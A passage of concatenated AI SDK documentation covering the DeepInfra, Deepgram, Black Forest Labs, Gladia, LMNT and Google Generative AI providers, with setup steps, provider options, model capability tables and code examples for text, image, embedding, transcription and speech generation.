Whether to perform sentiment analysis on the transcription. Optional.
speakerLabels boolean

Whether to label different speakers in the transcription. Optional.
speakersExpected number

Expected number of speakers in the audio. Optional.
speechThreshold number

Threshold for speech detection (0-1). Optional.
summarization boolean

Whether to generate a summary of the transcription. Optional.
summaryModel enum

Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
summaryType enum

Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
topics array of strings

List of topics to detect in the transcription. Optional.
webhookAuthHeaderName string

Name of the authentication header for webhook requests. Optional.
webhookAuthHeaderValue string

Value of the authentication header for webhook requests. Optional.
webhookUrl string

URL to send webhook notifications to. Optional.
wordBoost array of strings

List of words to boost in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`best`
`nano`

title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.

DeepInfra Provider

The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.

Setup

The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:

Provider Instance

You can import the default provider instance deepinfra from @ai-sdk/deepinfra:

import { deepinfra } from '@ai-sdk/deepinfra';

If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:

import { createDeepInfra } from '@ai-sdk/deepinfra';

const deepinfra = createDeepInfra({
  apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepInfra provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1.

Note: Language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

DeepInfra language models can also be used in the streamText function (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`
`meta-llama/Llama-4-Scout-17B-16E-Instruct`
`meta-llama/Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Meta-Llama-3.1-405B-Instruct`
`meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-70B-Instruct`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.2-11B-Vision-Instruct`
`meta-llama/Llama-3.2-90B-Vision-Instruct`
`mistralai/Mixtral-8x7B-Instruct-v0.1`
`deepseek-ai/DeepSeek-V3`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`deepseek-ai/DeepSeek-R1-Turbo`
`nvidia/Llama-3.1-Nemotron-70B-Instruct`
`Qwen/Qwen2-7B-Instruct`
`Qwen/Qwen2.5-72B-Instruct`
`Qwen/Qwen2.5-Coder-32B-Instruct`
`Qwen/QwQ-32B-Preview`
`google/codegemma-7b-it`
`google/gemma-2-9b-it`
`microsoft/WizardLM-2-8x22B`

Image Models

You can create DeepInfra image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model-specific options

You can pass model-specific parameters using the providerOptions.deepinfra field:

import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    deepinfra: {
      num_inference_steps: 30, // Control the number of denoising steps (1-50)
    },
  },
});

Model Capabilities

For models supporting aspect ratios, the following ratios are typically supported: 1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21

For models supporting size parameters, dimensions must typically be:

Multiples of 32
Width and height between 256 and 1440 pixels
Default size is 1024x1024

Model	Dimensions Specification	Notes
`stabilityai/sd3.5`	Aspect Ratio	Premium quality base model, 8B parameters
`black-forest-labs/FLUX-1.1-pro`	Size	Latest state-of-art model with superior prompt following
`black-forest-labs/FLUX-1-schnell`	Size	Fast generation in 1-4 steps
`black-forest-labs/FLUX-1-dev`	Size	Optimized for anatomical accuracy
`black-forest-labs/FLUX-pro`	Size	Flagship Flux model
`stabilityai/sd3.5-medium`	Aspect Ratio	Balanced 2.5B parameter model
`stabilityai/sdxl-turbo`	Aspect Ratio	Optimized for fast generation

For more details and pricing information, see the DeepInfra text-to-image models page.

Embedding Models

You can create DeepInfra embedding models using the .textEmbedding() factory method. For more on embedding models with the AI SDK see embed().

import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';

const { embedding } = await embed({
  model: deepinfra.textEmbedding('BAAI/bge-large-en-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`BAAI/bge-base-en-v1.5`	768	512
`BAAI/bge-large-en-v1.5`	1024	512
`BAAI/bge-m3`	1024	8192
`intfloat/e5-base-v2`	768	512
`intfloat/e5-large-v2`	1024	512
`intfloat/multilingual-e5-large`	1024	512
`sentence-transformers/all-MiniLM-L12-v2`	384	256
`sentence-transformers/all-MiniLM-L6-v2`	384	256
`sentence-transformers/all-mpnet-base-v2`	768	384
`sentence-transformers/clip-ViT-B-32`	512	77
`sentence-transformers/clip-ViT-B-32-multilingual-v1`	512	77
`sentence-transformers/multi-qa-mpnet-base-dot-v1`	768	512
`sentence-transformers/paraphrase-MiniLM-L6-v2`	384	128
`shibing624/text2vec-base-chinese`	768	512
`thenlper/gte-base`	768	512
`thenlper/gte-large`	1024	512

title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.

Deepgram Provider

The Deepgram provider contains language model support for the Deepgram transcription API.

Setup

The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with

Provider Instance

You can import the default provider instance deepgram from @ai-sdk/deepgram:

import { deepgram } from '@ai-sdk/deepgram';

If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:

import { createDeepgram } from '@ai-sdk/deepgram';

const deepgram = createDeepgram({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Deepgram provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Deepgram transcription API using the .transcription() factory method.

The first argument is the model id e.g. nova-3.

const model = deepgram.transcription('nova-3');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: { deepgram: { summarize: true } },
});

The following provider options are available:

language string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
smartFormat boolean

Whether to apply smart formatting to the transcription. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
paragraphs boolean

Whether to format the transcription into paragraphs. Optional.
summarize enum | boolean

Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
topics boolean

Whether to detect topics in the transcription. Optional.
intents boolean

Whether to detect intents in the transcription. Optional.
sentiment boolean

Whether to perform sentiment analysis on the transcription. Optional.
detectEntities boolean

Whether to detect entities in the transcription. Optional.
redact string | array of strings

Specifies what content to redact from the transcription. Optional.
replace string

Replacement string for redacted content. Optional.
search string

Search term to find in the transcription. Optional.
keyterm string

Key terms to identify in the transcription. Optional.
diarize boolean

Whether to identify different speakers in the transcription. Defaults to true. Optional.
utterances boolean

Whether to segment the transcription into utterances. Optional.
uttSplit number

Threshold for splitting utterances. Optional.
fillerWords boolean

Whether to include filler words (um, uh, etc.) in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`nova-3` (+ variants)
`nova-2` (+ variants)
`nova` (+ variants)
`enhanced` (+ variants)
`base` (+ variants)

title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.

Black Forest Labs Provider

Black Forest Labs provides a generative image platform for developers with FLUX-based models. Their platform offers fast, high quality, and in-context image generation and editing with precise and coherent results.

Setup

The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with

Provider Instance

You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';

If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Black Forest Labs provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
apiKey string

API key that is being sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Black Forest Labs image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { experimental_generateImage as generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.

Model	Description
`flux-kontext-pro`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`flux-kontext-max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`flux-pro-1.1-ultra`	Ultra-fast, ultra high-resolution image creation
`flux-pro-1.1`	Fast, high-quality image generation from text.

Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).

Modify Image

Transform existing images using text prompts.

import {
  blackForestLabs,
  BlackForestLabsImageProviderOptions,
} from '@ai-sdk/black-forest-labs';
import { experimental_generateImage as generateImage } from 'ai';

// Example: Modify existing image
await generateImage({
  model: blackForestLabs.image('flux-kontext-pro'),
  prompt: 'Put a donut next to the flour.',
  providerOptions: {
    blackForestLabs: {
      inputImage: '<base64 converted image>',
    } satisfies BlackForestLabsImageProviderOptions,
  },
});

Provider Options

Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. You can pass any parameters supported by the specific endpoint's API. The supported parameters depend on the used model ID:

imagePrompt - Base64-encoded image to use as additional visual context for generation
imagePromptStrength - Strength of the image prompt influence on generation (0.0 to 1.0)
inputImage - Base64 encoded image or URL of image to use as reference. Supports up to 20MB or 20 megapixels.
outputFormat - Desired format of the output image. Can be “jpeg” or “png”.
promptUpsampling - If true, performs upsampling on the prompt
raw - Enable raw mode for more natural, authentic aesthetics
safetyTolerance - Moderation level for inputs and outputs. Value ranges from 0 (most strict) to 6 (more permissive).
webhookSecret - Secret for webhook signature verification, sent in the X-Webhook-Secret header.
webhookUrl - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
pollIntervalMillis - Interval in milliseconds between polling attempts (default 500ms)
pollTimeoutMillis - Overall timeout in milliseconds for polling before timing out (default 60s)
width - Output width in pixels for models that support explicit dimensions. Range 256–1920, default 1024. When set, this overrides any width derived from size.
height - Output height in pixels for models that support explicit dimensions. Range 256–1920, default 768. When set, this overrides any height derived from size.
steps - Number of inference steps. Higher values may improve quality but increase generation time
guidance - Guidance scale for generation. Higher values follow the prompt more closely
inputImage2 … inputImage10 - Additional reference images (base64 string or URL) for models that support multiple inputs, used alongside inputImage.

Regional Endpoints

By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});

title: Gladia description: Learn how to use the Gladia provider for the AI SDK.

Gladia Provider

The Gladia provider contains language model support for the Gladia transcription API.

Setup

The Gladia provider is available in the @ai-sdk/gladia module. You can install it with

Provider Instance

You can import the default provider instance gladia from @ai-sdk/gladia:

import { gladia } from '@ai-sdk/gladia';

If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:

import { createGladia } from '@ai-sdk/gladia';

const gladia = createGladia({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Gladia provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Gladia transcription API using the .transcription() factory method.

const model = gladia.transcription();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: { gladia: { summarize: true } },
});

The following provider options are available:

contextPrompt string

Context to feed the transcription model with for possible better accuracy. Optional.
customVocabulary boolean | any[]

Custom vocabulary to improve transcription accuracy. Optional.
customVocabularyConfig object

Configuration for custom vocabulary. Optional.
- vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
- defaultIntensity number
detectLanguage boolean

Whether to automatically detect the language. Optional.
enableCodeSwitching boolean

Enable code switching for multilingual audio. Optional.
codeSwitchingConfig object

Configuration for code switching. Optional.
- languages string[]
language string

Specify the language of the audio. Optional.
callback boolean

Enable callback when transcription is complete. Optional.
callbackConfig object

Configuration for callback. Optional.
- url string
- method 'POST' | 'PUT'
subtitles boolean

Generate subtitles from the transcription. Optional.
subtitlesConfig object

Configuration for subtitles. Optional.
- formats Array<'srt' | 'vtt'>
- minimumDuration number
- maximumDuration number
- maximumCharactersPerRow number
- maximumRowsPerCaption number
- style 'default' | 'compliance'
diarization boolean

Enable speaker diarization. Defaults to true. Optional.
diarizationConfig object

Configuration for diarization. Optional.
- numberOfSpeakers number
- minSpeakers number
- maxSpeakers number
- enhanced boolean
translation boolean

Enable translation of the transcription. Optional.
translationConfig object

Configuration for translation. Optional.
- targetLanguages string[]
- model 'base' | 'enhanced'
- matchOriginalUtterances boolean
summarization boolean

Enable summarization of the transcription. Optional.
summarizationConfig object

Configuration for summarization. Optional.
- type 'general' | 'bullet_points' | 'concise'
moderation boolean

Enable content moderation. Optional.
namedEntityRecognition boolean

Enable named entity recognition. Optional.
chapterization boolean

Enable chapterization of the transcription. Optional.
nameConsistency boolean

Enable name consistency in the transcription. Optional.
customSpelling boolean

Enable custom spelling. Optional.
customSpellingConfig object

Configuration for custom spelling. Optional.
- spellingDictionary Record<string, string[]>
structuredDataExtraction boolean

Enable structured data extraction. Optional.
structuredDataExtractionConfig object

Configuration for structured data extraction. Optional.
- classes string[]
sentimentAnalysis boolean

Enable sentiment analysis. Optional.
audioToLlm boolean

Enable audio to LLM processing. Optional.
audioToLlmConfig object

Configuration for audio to LLM. Optional.
- prompts string[]
customMetadata Record<string, any>

Custom metadata to include with the request. Optional.
sentences boolean

Enable sentence detection. Optional.
displayMode boolean

Enable display mode. Optional.
punctuationEnhanced boolean

Enable enhanced punctuation. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`Default`

title: LMNT description: Learn how to use the LMNT provider for the AI SDK.

LMNT Provider

The LMNT provider contains language model support for the LMNT transcription API.

Setup

The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with

Provider Instance

You can import the default provider instance lmnt from @ai-sdk/lmnt:

import { lmnt } from '@ai-sdk/lmnt';

If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:

import { createLMNT } from '@ai-sdk/lmnt';

const lmnt = createLMNT({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the LMNT provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the LMNT speech API using the .speech() factory method.

The first argument is the model id e.g. aurora.

const model = lmnt.speech('aurora');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  language: 'en', // Standardized language parameter
});

Provider Options

The LMNT provider accepts the following options:

model 'aurora' | 'blizzard'

The LMNT model to use. Defaults to 'aurora'.
language 'auto' | 'en' | 'es' | 'pt' | 'fr' | 'de' | 'zh' | 'ko' | 'hi' | 'ja' | 'ru' | 'it' | 'tr'

The language to use for speech synthesis. Defaults to 'auto'.
format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'

The audio format to return. Defaults to 'mp3'.
sampleRate number

The sample rate of the audio in Hz. Defaults to 24000.
speed number

The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
seed number

An optional seed for deterministic generation.
conversational boolean

Whether to use a conversational style. Defaults to false.
length number

Maximum length of the audio in seconds. Maximum value is 300.
topP number

Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
temperature number

Temperature parameter for sampling. Must be at least 0. Defaults to 1.

Model Capabilities

Model	Instructions
`aurora`
`blizzard`

title: Google Generative AI description: Learn how to use Google Generative AI Provider.

Google Generative AI Provider

The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.

Setup

The Google provider is available in the @ai-sdk/google module. You can install it with

Provider Instance

You can import the default provider instance google from @ai-sdk/google:

import { google } from '@ai-sdk/google';

If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:

import { createGoogleGenerativeAI } from '@ai-sdk/google';

const google = createGoogleGenerativeAI({
  // custom settings
});

You can use the following optional settings to customize the Google Generative AI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
apiKey string

API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Google Generative AI API using the provider instance. The first argument is the model id, e.g. gemini-2.5-flash. The models support tool calls and some have multi-modal capabilities.

const model = google('gemini-2.5-flash');

You can use Google Generative AI language models to generate text with the generateText function:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Generative AI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = google('gemini-2.5-flash');

await generateText({
  model,
  providerOptions: {
    google: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    },
  },
});

The following optional provider options are available for Google Generative AI models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
responseModalities string[] The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
thinkingConfig { thinkingLevel?: 'low' | 'high'; thinkingBudget?: number; includeThoughts?: boolean }

Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
- thinkingLevel 'low' | 'high'
  
  Optional. Controls the thinking depth for Gemini 3 models. Use 'low' for faster responses or 'high' for deeper reasoning. Gemini 3.1 Pro supports 'low', 'medium', and 'high', Gemini 3 Pro supports 'low' and 'high', while Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
- thinkingBudget number
  
  Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see Google Generative AI thinking documentation.
- includeThoughts boolean
  
  Optional. If set to true, thought summaries are returned, which are synthisized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
imageConfig { aspectRatio: string }

Optional. Configuration for the models image generation. Only supported by specific Google Generative AI models.
- aspectRatio string
Model defaults to generate 1:1 squares, or to matching the output image size to that of your input image. Can be one of the following:
- 1:1
- 2:3
- 3:2
- 3:4
- 4:3
- 4:5
- 5:4
- 9:16
- 16:9
- 21:9
- imageSize string
  
  Controls the output image resolution. Defaults to 1K. Can be one of the following:
  - 1K
  - 2K
  - 4K
audioTimestamp boolean

Optional. Enables timestamp understanding for audio-only files. See Google Cloud audio understanding documentation.
mediaResolution string

Optional. If specified, the media resolution specified will be used. Can be one of the following:
- MEDIA_RESOLUTION_UNSPECIFIED
- MEDIA_RESOLUTION_LOW
- MEDIA_RESOLUTION_MEDIUM
- MEDIA_RESOLUTION_HIGH
See Google API MediaResolution documentation.
labels Record<string, string>

Optional. Defines labels used in billing reports. Available on Vertex AI only. See Google Cloud labels documentation.
serviceTier 'standard' | 'flex' | 'priority'

Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
threshold string

Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.

Thinking

The Gemini 2.5 and Gemini 3 series models use an internal "thinking process" that significantly improves their reasoning and multi-step planning abilities, making them highly effective for complex tasks such as coding, advanced mathematics, and data analysis. For more information see Google Generative AI thinking documentation.

Gemini 3 Models

For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:

import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-3.1-pro-preview');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingLevel: 'high',
        includeThoughts: true,
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

Gemini 2.5 Models

For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:

import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-2.5-flash');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingBudget: 8192,
        includeThoughts: true,
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

File Inputs

The Google Generative AI provider supports file inputs, e.g. PDF files.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

You can also use YouTube URLs directly:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this video',
        },
        {
          type: 'file',
          data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
          mediaType: 'video/mp4',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

To maximize cache hits with implicit caching:

Keep content at the beginning of requests consistent
Add variable content (like user questions) at the end of prompts
Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google?.usageMetadata);
// e.g.
// {
//   groundingMetadata: null,
//   safetyRatings: null,
//   usageMetadata: {
//     cachedContentTokenCount: 2027,
//     thoughtsTokenCount: 702,
//     promptTokenCount: 2152,
//     candidatesTokenCount: 710,
//     totalTokenCount: 3564
//   }
// }

Explicit Caching

For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the used model:

import { google } from '@ai-sdk/google';
import { GoogleAICacheManager } from '@google/generative-ai/server';
import { generateText } from 'ai';

const cacheManager = new GoogleAICacheManager(
  process.env.GOOGLE_GENERATIVE_AI_API_KEY,
);

const model = 'gemini-2.5-pro';

const { name: cachedContent } = await cacheManager.create({
  model,
  contents: [
    {
      role: 'user',
      parts: [{ text: '1000 Lasagna Recipes...' }],
    },
  ],
  ttlSeconds: 60 * 5,
});

const { text: veggieLasangaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    google: {
      cachedContent,
    },
  },
});

const { text: meatLasangaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a meat lasagna recipe for 12 people.',
  providerOptions: {
    google: {
      cachedContent,
    },
  },
});

Code Execution

With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.

You can enable code execution by adding the code_execution tool to your request.

import { google } from '@ai-sdk/google';
import { googleTools } from '@ai-sdk/google/internal';
import { generateText } from 'ai';

const { text, toolCalls, toolResults } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: { code_execution: google.tools.codeExecution({}) },
  prompt: 'Use python to calculate the 20th fibonacci number.',
});

The response will contain the tool calls and results from the code execution.

Google Search

With Google Search grounding, the model has access to the latest information using Google Search.

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

The googleSearch tool accepts the following optional configuration options:

searchTypes object

Enables specific search types. Both can be combined.
- webSearch: Enable web search grounding (pass {} to enable). This is the default.
- imageSearch: Enable image search grounding (pass {} to enable).
timeRangeFilter object

Restricts search results to a specific time range. Both startTime and endTime are required.
- startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
